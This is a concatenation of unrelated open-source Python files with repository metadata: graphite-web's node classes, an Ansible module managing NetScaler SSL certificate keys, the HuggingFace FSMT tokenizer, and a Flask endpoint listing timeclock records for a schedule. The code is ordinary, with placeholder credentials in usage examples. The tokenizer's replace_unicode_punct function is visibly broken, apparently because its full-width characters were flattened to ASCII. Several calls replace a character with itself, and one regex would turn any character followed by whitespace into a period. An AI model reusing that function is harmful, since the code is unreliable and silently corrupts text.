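#     from degiroapi.datatypes import Data
#
#     degiro = DeGiro()
#     degiro.login("your_username", "your_password")
#     products = degiro.search_products("Apple", limit=1)
#     print(degiro.getdata(Data.Type.PORTFOLIO))
#     print(degiro.orders(datetime.now() - timedelta(days=30), datetime.now()))
#     degiro.logout()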
avg_line_length: 45.415179 | max_line_length: 154 | alphanum_fraction: 0.588322

hexsha: 8e70ac502181662d1f6f44e013914a16620e8d51 | size: 745 | ext: py | lang: Python
max_stars: path=webapp/graphite/node.py, repo=chicagobuss/graphite-web, head=8f13d44d446acfaecefb438f1f4b8f56e5164092, licenses=["Apache-2.0"], count=2, event_min=2015-05-01T07:48:42.000Z, event_max=2019-06-17T18:55:55.000Z
max_issues: path=webapp/graphite/node.py, repo=kamaradclimber/graphite-web, head=522d84fed687bd946878e48d85982d59f7bd1267, licenses=["Apache-2.0"], count=2, event_min=2021-06-10T19:24:59.000Z, event_max=2022-02-11T03:39:33.000Z
max_forks: path=webapp/graphite/node.py, repo=kamaradclimber/graphite-web, head=522d84fed687bd946878e48d85982d59f7bd1267, licenses=["Apache-2.0"], count=13, event_min=2017-01-12T11:07:22.000Z, event_max=2019-04-19T09:55:52.000Z
content (webapp/graphite/node.py):
class Node(object):
__slots__ = ('name', 'path', 'local', 'is_leaf')
def __init__(self, path):
self.path = path
self.name = path.split('.')[-1]
self.local = True
self.is_leaf = False
def __repr__(self):
return '<%s[%x]: %s>' % (self.__class__.__name__, id(self), self.path)
class BranchNode(Node):
pass
class LeafNode(Node):
__slots__ = ('reader', 'intervals')
def __init__(self, path, reader):
Node.__init__(self, path)
self.reader = reader
self.intervals = reader.get_intervals()
self.is_leaf = True
def fetch(self, startTime, endTime):
return self.reader.fetch(startTime, endTime)
def __repr__(self):
return '<LeafNode[%x]: %s (%s)>' % (id(self), self.path, self.reader)
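# Usage sketch (appended for illustration, not part of the original module).
# DummyReader stands in for graphite-web's real reader objects; only the
# get_intervals()/fetch() interface used above is assumed.
if __name__ == "__main__":
    class DummyReader(object):
        def get_intervals(self):
            return []

        def fetch(self, startTime, endTime):
            return ((startTime, endTime, 60), [])  # illustrative (timeInfo, values) shape

    branch = BranchNode('servers.web01')
    leaf = LeafNode('servers.web01.cpu.load', DummyReader())
    print(branch, leaf, leaf.is_leaf)
    print(leaf.fetch(0, 3600))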
avg_line_length: 21.911765 | max_line_length: 74 | alphanum_fraction: 0.636242

hexsha: 43d1f593d8d4326a55321cbb9249f82ff4edd488 | size: 11,855 | ext: py | lang: Python
max_stars: path=virt/ansible-latest/lib/python2.7/site-packages/ansible/modules/network/netscaler/netscaler_ssl_certkey.py, repo=lakhlaifi/RedHat-Ansible, head=27c5077cced9d416081fcd5d69ea44bca0317fa4, licenses=["Apache-2.0"], count=1, event_min=2020-03-29T18:41:01.000Z, event_max=2020-03-29T18:41:01.000Z
max_issues: path=ansible/ansible/modules/network/netscaler/netscaler_ssl_certkey.py, repo=SergeyCherepanov/ansible, head=875711cd2fd6b783c812241c2ed7a954bf6f670f, licenses=["MIT"], count=7, event_min=2020-09-07T17:27:56.000Z, event_max=2022-03-02T06:25:46.000Z
max_forks: path=ansible/ansible/modules/network/netscaler/netscaler_ssl_certkey.py, repo=SergeyCherepanov/ansible, head=875711cd2fd6b783c812241c2ed7a954bf6f670f, licenses=["MIT"], count=1, event_min=2020-10-30T12:48:24.000Z, event_max=2020-10-30T12:48:24.000Z
content (netscaler_ssl_certkey.py):
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (c) 2017 Citrix Systems
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: netscaler_ssl_certkey
short_description: Manage ssl certificate keys.
description:
    - Manage ssl certificate keys.
version_added: "2.4.0"
author: George Nikolopoulos (@giorgos-nikolopoulos)
options:
certkey:
description:
- >-
Name for the certificate and private-key pair. Must begin with an ASCII alphanumeric or underscore
C(_) character, and must contain only ASCII alphanumeric, underscore C(_), hash C(#), period C(.), space C( ),
colon C(:), at C(@), equals C(=), and hyphen C(-) characters. Cannot be changed after the certificate-key
pair is created.
- "The following requirement applies only to the NetScaler CLI:"
- >-
If the name includes one or more spaces, enclose the name in double or single quotation marks (for
example, "my cert" or 'my cert').
- "Minimum length = 1"
cert:
description:
- >-
Name of and, optionally, path to the X509 certificate file that is used to form the certificate-key
pair. The certificate file should be present on the appliance's hard-disk drive or solid-state drive.
Storing a certificate in any location other than the default might cause inconsistency in a high
availability setup. /nsconfig/ssl/ is the default path.
- "Minimum length = 1"
key:
description:
- >-
Name of and, optionally, path to the private-key file that is used to form the certificate-key pair.
The certificate file should be present on the appliance's hard-disk drive or solid-state drive.
Storing a certificate in any location other than the default might cause inconsistency in a high
availability setup. /nsconfig/ssl/ is the default path.
- "Minimum length = 1"
password:
description:
- >-
Passphrase that was used to encrypt the private-key. Use this option to load encrypted private-keys
in PEM format.
inform:
choices:
- 'DER'
- 'PEM'
- 'PFX'
description:
- >-
Input format of the certificate and the private-key files. The three formats supported by the
appliance are:
- "PEM - Privacy Enhanced Mail"
- "DER - Distinguished Encoding Rule"
- "PFX - Personal Information Exchange."
passplain:
description:
- >-
Pass phrase used to encrypt the private-key. Required when adding an encrypted private-key in PEM
format.
- "Minimum length = 1"
expirymonitor:
choices:
- 'enabled'
- 'disabled'
description:
- "Issue an alert when the certificate is about to expire."
notificationperiod:
description:
- >-
Time, in number of days, before certificate expiration, at which to generate an alert that the
certificate is about to expire.
- "Minimum value = C(10)"
- "Maximum value = C(100)"
extends_documentation_fragment: netscaler
requirements:
- nitro python sdk
'''
EXAMPLES = '''
- name: Setup ssl certkey
delegate_to: localhost
netscaler_ssl_certkey:
nitro_user: nsroot
nitro_pass: nsroot
nsip: 172.18.0.2
    certkey: certificate_1
cert: server.crt
key: server.key
expirymonitor: enabled
notificationperiod: 30
inform: PEM
password: False
passplain: somesecret
'''
RETURN = '''
loglines:
description: list of logged messages by the module
returned: always
type: list
sample: "['message 1', 'message 2']"
msg:
description: Message detailing the failure reason
returned: failure
type: str
sample: "Action does not exist"
diff:
description: List of differences between the actual configured object and the configuration specified in the module
returned: failure
type: dict
sample: "{ 'targetlbvserver': 'difference. ours: (str) server1 other: (str) server2' }"
'''
try:
from nssrc.com.citrix.netscaler.nitro.resource.config.ssl.sslcertkey import sslcertkey
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
PYTHON_SDK_IMPORTED = True
except ImportError as e:
PYTHON_SDK_IMPORTED = False
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network.netscaler.netscaler import ConfigProxy, get_nitro_client, netscaler_common_arguments, log, loglines, \
get_immutables_intersection
def key_exists(client, module):
log('Checking if key exists')
log('certkey is %s' % module.params['certkey'])
all_certificates = sslcertkey.get(client)
certkeys = [item.certkey for item in all_certificates]
if module.params['certkey'] in certkeys:
return True
else:
return False
def key_identical(client, module, sslcertkey_proxy):
log('Checking if configured key is identical')
sslcertkey_list = sslcertkey.get_filtered(client, 'certkey:%s' % module.params['certkey'])
diff_dict = sslcertkey_proxy.diff_object(sslcertkey_list[0])
if 'password' in diff_dict:
del diff_dict['password']
if 'passplain' in diff_dict:
del diff_dict['passplain']
if len(diff_dict) == 0:
return True
else:
return False
def diff_list(client, module, sslcertkey_proxy):
sslcertkey_list = sslcertkey.get_filtered(client, 'certkey:%s' % module.params['certkey'])
return sslcertkey_proxy.diff_object(sslcertkey_list[0])
def main():
module_specific_arguments = dict(
certkey=dict(type='str'),
cert=dict(type='str'),
key=dict(type='str'),
password=dict(type='bool'),
inform=dict(
type='str',
choices=[
'DER',
'PEM',
'PFX',
]
),
passplain=dict(
type='str',
no_log=True,
),
expirymonitor=dict(
type='str',
choices=[
'enabled',
'disabled',
]
),
notificationperiod=dict(type='float'),
)
argument_spec = dict()
argument_spec.update(netscaler_common_arguments)
argument_spec.update(module_specific_arguments)
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
)
module_result = dict(
changed=False,
failed=False,
loglines=loglines,
)
# Fail the module if imports failed
if not PYTHON_SDK_IMPORTED:
module.fail_json(msg='Could not load nitro python sdk')
# Fallthrough to rest of execution
client = get_nitro_client(module)
try:
client.login()
except nitro_exception as e:
msg = "nitro exception during login. errorcode=%s, message=%s" % (str(e.errorcode), e.message)
module.fail_json(msg=msg)
except Exception as e:
if str(type(e)) == "<class 'requests.exceptions.ConnectionError'>":
module.fail_json(msg='Connection error %s' % str(e))
elif str(type(e)) == "<class 'requests.exceptions.SSLError'>":
module.fail_json(msg='SSL Error %s' % str(e))
else:
module.fail_json(msg='Unexpected error during login %s' % str(e))
readwrite_attrs = [
'certkey',
'cert',
'key',
'password',
'inform',
'passplain',
'expirymonitor',
'notificationperiod',
]
readonly_attrs = [
'signaturealg',
'certificatetype',
'serial',
'issuer',
'clientcertnotbefore',
'clientcertnotafter',
'daystoexpiration',
'subject',
'publickey',
'publickeysize',
'version',
'priority',
'status',
'passcrypt',
'data',
'servicename',
]
immutable_attrs = [
'certkey',
'cert',
'key',
'password',
'inform',
'passplain',
]
transforms = {
'expirymonitor': [lambda v: v.upper()],
}
# Instantiate config proxy
sslcertkey_proxy = ConfigProxy(
actual=sslcertkey(),
client=client,
attribute_values_dict=module.params,
readwrite_attrs=readwrite_attrs,
readonly_attrs=readonly_attrs,
immutable_attrs=immutable_attrs,
transforms=transforms,
)
try:
if module.params['state'] == 'present':
log('Applying actions for state present')
if not key_exists(client, module):
if not module.check_mode:
log('Adding certificate key')
sslcertkey_proxy.add()
if module.params['save_config']:
client.save_config()
module_result['changed'] = True
elif not key_identical(client, module, sslcertkey_proxy):
# Check if we try to change value of immutable attributes
immutables_changed = get_immutables_intersection(sslcertkey_proxy, diff_list(client, module, sslcertkey_proxy).keys())
if immutables_changed != []:
module.fail_json(
msg='Cannot update immutable attributes %s' % (immutables_changed,),
diff=diff_list(client, module, sslcertkey_proxy),
**module_result
)
if not module.check_mode:
sslcertkey_proxy.update()
if module.params['save_config']:
client.save_config()
module_result['changed'] = True
else:
module_result['changed'] = False
# Sanity check for state
if not module.check_mode:
log('Sanity checks for state present')
if not key_exists(client, module):
module.fail_json(msg='SSL certkey does not exist')
if not key_identical(client, module, sslcertkey_proxy):
module.fail_json(msg='SSL certkey differs from configured', diff=diff_list(client, module, sslcertkey_proxy))
elif module.params['state'] == 'absent':
log('Applying actions for state absent')
if key_exists(client, module):
if not module.check_mode:
sslcertkey_proxy.delete()
if module.params['save_config']:
client.save_config()
module_result['changed'] = True
else:
module_result['changed'] = False
# Sanity check for state
if not module.check_mode:
log('Sanity checks for state absent')
if key_exists(client, module):
module.fail_json(msg='SSL certkey still exists')
except nitro_exception as e:
msg = "nitro exception errorcode=%s, message=%s" % (str(e.errorcode), e.message)
module.fail_json(msg=msg, **module_result)
client.logout()
module.exit_json(**module_result)
if __name__ == "__main__":
main()
avg_line_length: 31.86828 | max_line_length: 136 | alphanum_fraction: 0.592324

hexsha: 226d18cc3eab0ef89909ec04d8bc2573e6aa763b | size: 19,460 | ext: py | lang: Python
max_stars: path=src/transformers/models/fsmt/tokenization_fsmt.py, repo=reichang182/Transformer, head=301536b15f1e757c51411800c25876617e9f1191, licenses=["Apache-2.0"], count=2, event_min=2021-09-20T05:44:21.000Z, event_max=2022-01-25T08:13:44.000Z
max_issues: path=src/transformers/models/fsmt/tokenization_fsmt.py, repo=slavetothebiologicalforce/transformers, head=6f90c29eaaba898919b7689ab7e2cfce1604cdb8, licenses=["Apache-2.0"], count=null, event_min=null, event_max=null
max_forks: path=src/transformers/models/fsmt/tokenization_fsmt.py, repo=slavetothebiologicalforce/transformers, head=6f90c29eaaba898919b7689ab7e2cfce1604cdb8, licenses=["Apache-2.0"], count=1, event_min=2021-04-19T20:49:55.000Z, event_max=2021-04-19T20:49:55.000Z
content (src/transformers/models/fsmt/tokenization_fsmt.py):
# coding=utf-8
# Copyright 2019 The Open AI Team Authors and The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tokenization classes for FSMT."""
import json
import os
import re
import unicodedata
from typing import Dict, List, Optional, Tuple
import sacremoses as sm
from ...tokenization_utils import PreTrainedTokenizer
from ...utils import logging
logger = logging.get_logger(__name__)
VOCAB_FILES_NAMES = {
"src_vocab_file": "vocab-src.json",
"tgt_vocab_file": "vocab-tgt.json",
"merges_file": "merges.txt",
}
PRETRAINED_VOCAB_FILES_MAP = {
"src_vocab_file": {
"stas/tiny-wmt19-en-de": "https://huggingface.co/stas/tiny-wmt19-en-de/resolve/main/vocab-src.json"
},
"tgt_vocab_file": {
"stas/tiny-wmt19-en-de": "https://huggingface.co/stas/tiny-wmt19-en-de/resolve/main/vocab-tgt.json"
},
"merges_file": {"stas/tiny-wmt19-en-de": "https://huggingface.co/stas/tiny-wmt19-en-de/resolve/main/merges.txt"},
}
PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {"stas/tiny-wmt19-en-de": 1024}
PRETRAINED_INIT_CONFIGURATION = {
"stas/tiny-wmt19-en-de": {
"langs": ["en", "de"],
"model_max_length": 1024,
"special_tokens_map_file": None,
"full_tokenizer_file": None,
}
}
def get_pairs(word):
"""
Return set of symbol pairs in a word. word is represented as tuple of symbols (symbols being variable-length
strings)
"""
pairs = set()
prev_char = word[0]
for char in word[1:]:
pairs.add((prev_char, char))
prev_char = char
return pairs
def replace_unicode_punct(text):
"""
Port of https://github.com/moses-smt/mosesdecoder/blob/master/scripts/tokenizer/replace-unicode-punctuation.perl
"""
text = text.replace(",", ",")
text = re.sub(r"。\s*", ". ", text)
text = text.replace("、", ",")
text = text.replace("”", '"')
text = text.replace("“", '"')
text = text.replace("∶", ":")
text = text.replace(":", ":")
text = text.replace("?", "?")
text = text.replace("《", '"')
text = text.replace("》", '"')
text = text.replace(")", ")")
text = text.replace("!", "!")
text = text.replace("(", "(")
text = text.replace(";", ";")
text = text.replace("1", "1")
text = text.replace("」", '"')
text = text.replace("「", '"')
text = text.replace("0", "0")
text = text.replace("3", "3")
text = text.replace("2", "2")
text = text.replace("5", "5")
text = text.replace("6", "6")
text = text.replace("9", "9")
text = text.replace("7", "7")
text = text.replace("8", "8")
text = text.replace("4", "4")
text = re.sub(r".\s*", ". ", text)
text = text.replace("~", "~")
text = text.replace("’", "'")
text = text.replace("…", "...")
text = text.replace("━", "-")
text = text.replace("〈", "<")
text = text.replace("〉", ">")
text = text.replace("【", "[")
text = text.replace("】", "]")
text = text.replace("%", "%")
return text
def remove_non_printing_char(text):
"""
Port of https://github.com/moses-smt/mosesdecoder/blob/master/scripts/tokenizer/remove-non-printing-char.perl
"""
output = []
for char in text:
cat = unicodedata.category(char)
if cat.startswith("C"):
continue
output.append(char)
return "".join(output)
# Porting notes:
# this one is modeled after XLMTokenizer
#
# added:
# - src_vocab_file,
# - tgt_vocab_file,
# - langs,
class FSMTTokenizer(PreTrainedTokenizer):
"""
Construct an FAIRSEQ Transformer tokenizer. Based on Byte-Pair Encoding. The tokenization process is the following:
- Moses preprocessing and tokenization.
- Normalizing all inputs text.
- The arguments ``special_tokens`` and the function ``set_special_tokens``, can be used to add additional symbols
(like "__classify__") to a vocabulary.
- The argument :obj:`langs` defines a pair of languages.
This tokenizer inherits from :class:`~transformers.PreTrainedTokenizer` which contains most of the main methods.
Users should refer to this superclass for more information regarding those methods.
Args:
langs (:obj:`List[str]`):
A list of two languages to translate from and to, for instance :obj:`["en", "ru"]`.
src_vocab_file (:obj:`str`):
File containing the vocabulary for the source language.
tgt_vocab_file (:obj:`st`):
File containing the vocabulary for the target language.
merges_file (:obj:`str`):
File containing the merges.
do_lower_case (:obj:`bool`, `optional`, defaults to :obj:`False`):
Whether or not to lowercase the input when tokenizing.
unk_token (:obj:`str`, `optional`, defaults to :obj:`"<unk>"`):
The unknown token. A token that is not in the vocabulary cannot be converted to an ID and is set to be this
token instead.
bos_token (:obj:`str`, `optional`, defaults to :obj:`"<s>"`):
The beginning of sequence token that was used during pretraining. Can be used a sequence classifier token.
.. note::
When building a sequence using special tokens, this is not the token that is used for the beginning of
sequence. The token used is the :obj:`cls_token`.
sep_token (:obj:`str`, `optional`, defaults to :obj:`"</s>"`):
The separator token, which is used when building a sequence from multiple sequences, e.g. two sequences for
sequence classification or for a text and a question for question answering. It is also used as the last
token of a sequence built with special tokens.
pad_token (:obj:`str`, `optional`, defaults to :obj:`"<pad>"`):
The token used for padding, for example when batching sequences of different lengths.
"""
vocab_files_names = VOCAB_FILES_NAMES
pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
pretrained_init_configuration = PRETRAINED_INIT_CONFIGURATION
max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES
model_input_names = ["input_ids", "attention_mask"]
def __init__(
self,
langs=None,
src_vocab_file=None,
tgt_vocab_file=None,
merges_file=None,
do_lower_case=False,
unk_token="<unk>",
bos_token="<s>",
sep_token="</s>",
pad_token="<pad>",
**kwargs
):
super().__init__(
langs=langs,
src_vocab_file=src_vocab_file,
tgt_vocab_file=tgt_vocab_file,
merges_file=merges_file,
do_lower_case=do_lower_case,
unk_token=unk_token,
bos_token=bos_token,
sep_token=sep_token,
pad_token=pad_token,
**kwargs,
)
self.src_vocab_file = src_vocab_file
self.tgt_vocab_file = tgt_vocab_file
self.merges_file = merges_file
self.do_lower_case = do_lower_case
# cache of sm.MosesPunctNormalizer instance
self.cache_moses_punct_normalizer = dict()
# cache of sm.MosesTokenizer instance
self.cache_moses_tokenizer = dict()
self.cache_moses_detokenizer = dict()
if langs and len(langs) == 2:
self.src_lang, self.tgt_lang = langs
else:
raise ValueError(
f"arg `langs` needs to be a list of 2 langs, e.g. ['en', 'ru'], but got {langs}. "
"Usually that means that tokenizer can't find a mapping for the given model path "
"in PRETRAINED_VOCAB_FILES_MAP, and other maps of this tokenizer."
)
with open(src_vocab_file, encoding="utf-8") as src_vocab_handle:
self.encoder = json.load(src_vocab_handle)
with open(tgt_vocab_file, encoding="utf-8") as tgt_vocab_handle:
tgt_vocab = json.load(tgt_vocab_handle)
self.decoder = {v: k for k, v in tgt_vocab.items()}
with open(merges_file, encoding="utf-8") as merges_handle:
merges = merges_handle.read().split("\n")[:-1]
merges = [tuple(merge.split()[:2]) for merge in merges]
self.bpe_ranks = dict(zip(merges, range(len(merges))))
self.cache = {}
# hack override
def get_vocab(self) -> Dict[str, int]:
return self.get_src_vocab()
# hack override
@property
def vocab_size(self) -> int:
return self.src_vocab_size
def moses_punct_norm(self, text, lang):
if lang not in self.cache_moses_punct_normalizer:
punct_normalizer = sm.MosesPunctNormalizer(lang=lang)
self.cache_moses_punct_normalizer[lang] = punct_normalizer
return self.cache_moses_punct_normalizer[lang].normalize(text)
def moses_tokenize(self, text, lang):
if lang not in self.cache_moses_tokenizer:
moses_tokenizer = sm.MosesTokenizer(lang=lang)
self.cache_moses_tokenizer[lang] = moses_tokenizer
return self.cache_moses_tokenizer[lang].tokenize(
text, aggressive_dash_splits=True, return_str=False, escape=True
)
def moses_detokenize(self, tokens, lang):
        if lang not in self.cache_moses_detokenizer:
            moses_detokenizer = sm.MosesDetokenizer(lang=lang)
self.cache_moses_detokenizer[lang] = moses_detokenizer
return self.cache_moses_detokenizer[lang].detokenize(tokens)
def moses_pipeline(self, text, lang):
text = replace_unicode_punct(text)
text = self.moses_punct_norm(text, lang)
text = remove_non_printing_char(text)
return text
@property
def src_vocab_size(self):
return len(self.encoder)
@property
def tgt_vocab_size(self):
return len(self.decoder)
def get_src_vocab(self):
return dict(self.encoder, **self.added_tokens_encoder)
def get_tgt_vocab(self):
return dict(self.decoder, **self.added_tokens_decoder)
def bpe(self, token):
word = tuple(token[:-1]) + (token[-1] + "</w>",)
if token in self.cache:
return self.cache[token]
pairs = get_pairs(word)
if not pairs:
return token + "</w>"
while True:
bigram = min(pairs, key=lambda pair: self.bpe_ranks.get(pair, float("inf")))
if bigram not in self.bpe_ranks:
break
first, second = bigram
new_word = []
i = 0
while i < len(word):
try:
j = word.index(first, i)
except ValueError:
new_word.extend(word[i:])
break
else:
new_word.extend(word[i:j])
i = j
if word[i] == first and i < len(word) - 1 and word[i + 1] == second:
new_word.append(first + second)
i += 2
else:
new_word.append(word[i])
i += 1
new_word = tuple(new_word)
word = new_word
if len(word) == 1:
break
else:
pairs = get_pairs(word)
word = " ".join(word)
if word == "\n </w>":
word = "\n</w>"
self.cache[token] = word
return word
def _tokenize(self, text, lang="en", bypass_tokenizer=False):
"""
Tokenize a string given language code using Moses.
Details of tokenization:
- [sacremoses](https://github.com/alvations/sacremoses): port of Moses
- Install with `pip install sacremoses`
Args:
- lang: ISO language code (default = 'en') (string). Languages should belong of the model supported
languages. However, we don't enforce it.
- bypass_tokenizer: Allow users to preprocess and tokenize the sentences externally (default = False)
(bool). If True, we only apply BPE.
Returns:
List of tokens.
"""
        # ignore `lang` which currently isn't explicitly passed in tokenization_utils.py and always results in lang=en
# if lang != self.src_lang:
# raise ValueError(f"Expected lang={self.src_lang}, but got {lang}")
lang = self.src_lang
if self.do_lower_case:
text = text.lower()
if bypass_tokenizer:
text = text.split()
else:
text = self.moses_pipeline(text, lang=lang)
text = self.moses_tokenize(text, lang=lang)
split_tokens = []
for token in text:
if token:
split_tokens.extend([t for t in self.bpe(token).split(" ")])
return split_tokens
def _convert_token_to_id(self, token):
""" Converts a token (str) in an id using the vocab. """
return self.encoder.get(token, self.encoder.get(self.unk_token))
def _convert_id_to_token(self, index):
"""Converts an index (integer) in a token (str) using the vocab."""
return self.decoder.get(index, self.unk_token)
def convert_tokens_to_string(self, tokens):
""" Converts a sequence of tokens (string) in a single string. """
# remove BPE
tokens = [t.replace(" ", "").replace("</w>", " ") for t in tokens]
tokens = "".join(tokens).split()
# detokenize
text = self.moses_detokenize(tokens, self.tgt_lang)
return text
def build_inputs_with_special_tokens(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
) -> List[int]:
"""
Build model inputs from a sequence or a pair of sequence for sequence classification tasks by concatenating and
adding special tokens. A FAIRSEQ Transformer sequence has the following format:
- single sequence: ``<s> X </s>``
- pair of sequences: ``<s> A </s> B </s>``
Args:
token_ids_0 (:obj:`List[int]`):
List of IDs to which the special tokens will be added.
token_ids_1 (:obj:`List[int]`, `optional`):
Optional second list of IDs for sequence pairs.
Returns:
:obj:`List[int]`: List of `input IDs <../glossary.html#input-ids>`__ with the appropriate special tokens.
"""
sep = [self.sep_token_id]
# no bos used in fairseq
if token_ids_1 is None:
return token_ids_0 + sep
return token_ids_0 + sep + token_ids_1 + sep
def get_special_tokens_mask(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None, already_has_special_tokens: bool = False
) -> List[int]:
"""
Retrieve sequence ids from a token list that has no special tokens added. This method is called when adding
special tokens using the tokenizer ``prepare_for_model`` method.
Args:
token_ids_0 (:obj:`List[int]`):
List of IDs.
token_ids_1 (:obj:`List[int]`, `optional`):
Optional second list of IDs for sequence pairs.
already_has_special_tokens (:obj:`bool`, `optional`, defaults to :obj:`False`):
Whether or not the token list is already formatted with special tokens for the model.
Returns:
:obj:`List[int]`: A list of integers in the range [0, 1]: 1 for a special token, 0 for a sequence token.
"""
if already_has_special_tokens:
return super().get_special_tokens_mask(
token_ids_0=token_ids_0, token_ids_1=token_ids_1, already_has_special_tokens=True
)
# no bos used in fairseq
if token_ids_1 is not None:
return ([0] * len(token_ids_0)) + [1] + ([0] * len(token_ids_1)) + [1]
return ([0] * len(token_ids_0)) + [1]
def create_token_type_ids_from_sequences(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
) -> List[int]:
"""
Create a mask from the two sequences passed to be used in a sequence-pair classification task. A FAIRSEQ
Transformer sequence pair mask has the following format:
::
0 0 0 0 0 0 0 0 0 0 0 1 1 1 1 1 1 1 1 1
| first sequence | second sequence |
If :obj:`token_ids_1` is :obj:`None`, this method only returns the first portion of the mask (0s).
Args:
token_ids_0 (:obj:`List[int]`):
List of IDs.
token_ids_1 (:obj:`List[int]`, `optional`):
Optional second list of IDs for sequence pairs.
Returns:
:obj:`List[int]`: List of `token type IDs <../glossary.html#token-type-ids>`_ according to the given
sequence(s).
"""
sep = [self.sep_token_id]
# no bos used in fairseq
if token_ids_1 is None:
return len(token_ids_0 + sep) * [0]
return len(token_ids_0 + sep) * [0] + len(token_ids_1 + sep) * [1]
def save_vocabulary(self, save_directory: str, filename_prefix: Optional[str] = None) -> Tuple[str]:
if not os.path.isdir(save_directory):
logger.error(f"Vocabulary path ({save_directory}) should be a directory")
return
src_vocab_file = os.path.join(
save_directory, (filename_prefix + "-" if filename_prefix else "") + VOCAB_FILES_NAMES["src_vocab_file"]
)
tgt_vocab_file = os.path.join(
save_directory, (filename_prefix + "-" if filename_prefix else "") + VOCAB_FILES_NAMES["tgt_vocab_file"]
)
merges_file = os.path.join(
save_directory, (filename_prefix + "-" if filename_prefix else "") + VOCAB_FILES_NAMES["merges_file"]
)
with open(src_vocab_file, "w", encoding="utf-8") as f:
f.write(json.dumps(self.encoder, ensure_ascii=False))
with open(tgt_vocab_file, "w", encoding="utf-8") as f:
tgt_vocab = {v: k for k, v in self.decoder.items()}
f.write(json.dumps(tgt_vocab, ensure_ascii=False))
index = 0
with open(merges_file, "w", encoding="utf-8") as writer:
for bpe_tokens, token_index in sorted(self.bpe_ranks.items(), key=lambda kv: kv[1]):
if index != token_index:
logger.warning(
f"Saving vocabulary to {merges_file}: BPE merge indices are not consecutive."
" Please check that the tokenizer is not corrupted!"
)
index = token_index
writer.write(" ".join(bpe_tokens) + "\n")
index += 1
return src_vocab_file, tgt_vocab_file, merges_file
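# Illustrative sketch (not part of the original module): the single-sequence and
# sequence-pair layouts documented above, reproduced with plain lists and a stand-in
# sep id so the shapes are easy to verify without instantiating the tokenizer. The
# sep id value used here (2) is an assumption made only for this example.
def _special_token_layout_demo():
    sep = [2]  # hypothetical sep_token_id
    ids_a, ids_b = [5, 6], [7, 8]
    single = ids_a + sep                                              # sequence + sep
    pair = ids_a + sep + ids_b + sep                                  # pair: A sep B sep
    special_mask = [0] * len(ids_a) + [1] + [0] * len(ids_b) + [1]    # 1 marks special tokens
    token_type_ids = [0] * len(ids_a + sep) + [1] * len(ids_b + sep)  # 0s for A, 1s for B
    assert single == [5, 6, 2]
    assert pair == [5, 6, 2, 7, 8, 2]
    assert special_mask == [0, 0, 1, 0, 0, 1]
    assert token_type_ids == [0, 0, 0, 1, 1, 1]
    return single, pair, special_mask, token_type_ids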
| 37.640232
| 121
| 0.605447
|
0c7ac38273a2c7a34ff7631c51a1005aa56f7201
| 1,471
|
py
|
Python
|
app/apiv2/organizations/locations/roles/schedules/timeclocks/timeclocks.py
|
matthewstrasiotto/suite
|
8d83208f965f23e0a33db6b3b7f9e5126f7324f8
|
[
"MIT"
] | null | null | null |
app/apiv2/organizations/locations/roles/schedules/timeclocks/timeclocks.py
|
matthewstrasiotto/suite
|
8d83208f965f23e0a33db6b3b7f9e5126f7324f8
|
[
"MIT"
] | null | null | null |
app/apiv2/organizations/locations/roles/schedules/timeclocks/timeclocks.py
|
matthewstrasiotto/suite
|
8d83208f965f23e0a33db6b3b7f9e5126f7324f8
|
[
"MIT"
] | null | null | null |
from flask_restful import marshal, reqparse, Resource
from app.constants import API_ENVELOPE
from app.models import Schedule2, Timeclock
from app.apiv2.decorators import verify_org_location_role_schedule, \
permission_location_manager
from app.apiv2.marshal import timeclock_fields
class ScheduleTimeclocksApi(Resource):
@verify_org_location_role_schedule
@permission_location_manager
def get(self, org_id, location_id, role_id, schedule_id):
"""
        Return all timeclock records whose start falls within the timespan of the given schedule.
"""
parser = reqparse.RequestParser()
parser.add_argument("user_id", type=int)
parameters = parser.parse_args()
# Filter out null values
parameters = dict((k, v) for k, v in parameters.items()
if v is not None)
# get schedule object
schedule = Schedule2.query.get_or_404(schedule_id)
# prepare query
timeclocks = Timeclock.query \
.filter_by(role_id=role_id) \
.filter(Timeclock.start >= schedule.start) \
.filter(Timeclock.start < schedule.stop)
        # optionally filter by user id if it was provided
if "user_id" in parameters:
timeclocks = timeclocks.filter_by(
user_id=parameters.get("user_id"))
return {
API_ENVELOPE:
[marshal(timeclock, timeclock_fields) for timeclock in timeclocks.all()]
}
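# Illustrative client-side sketch (not part of this module): fetch the timeclocks that
# fall within one schedule over HTTP. The host, ids and credentials below are
# hypothetical placeholders; the response body is wrapped in the API envelope defined
# in app.constants.
def _example_fetch_schedule_timeclocks():
    import requests  # assumed to be available in the client environment
    url = ("https://suite.example.com/api/v2/organizations/1/locations/2"
           "/roles/3/schedules/4/timeclocks/")
    response = requests.get(url, params={"user_id": 7}, auth=("api_key", ""))
    response.raise_for_status()
    return response.json()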
| 32.688889
| 86
| 0.658736
|
af00da665410b17978a3af46701683e86932fbe2
| 1,012
|
py
|
Python
|
bin/update-search-index.py
|
not-nexus/shelf
|
ea59703082402ad3b6454482f0487418295fbd19
|
[
"MIT"
] | 4
|
2016-11-07T13:02:18.000Z
|
2019-09-03T02:04:05.000Z
|
bin/update-search-index.py
|
not-nexus/shelf
|
ea59703082402ad3b6454482f0487418295fbd19
|
[
"MIT"
] | 21
|
2016-11-30T20:44:52.000Z
|
2017-05-02T15:38:56.000Z
|
bin/update-search-index.py
|
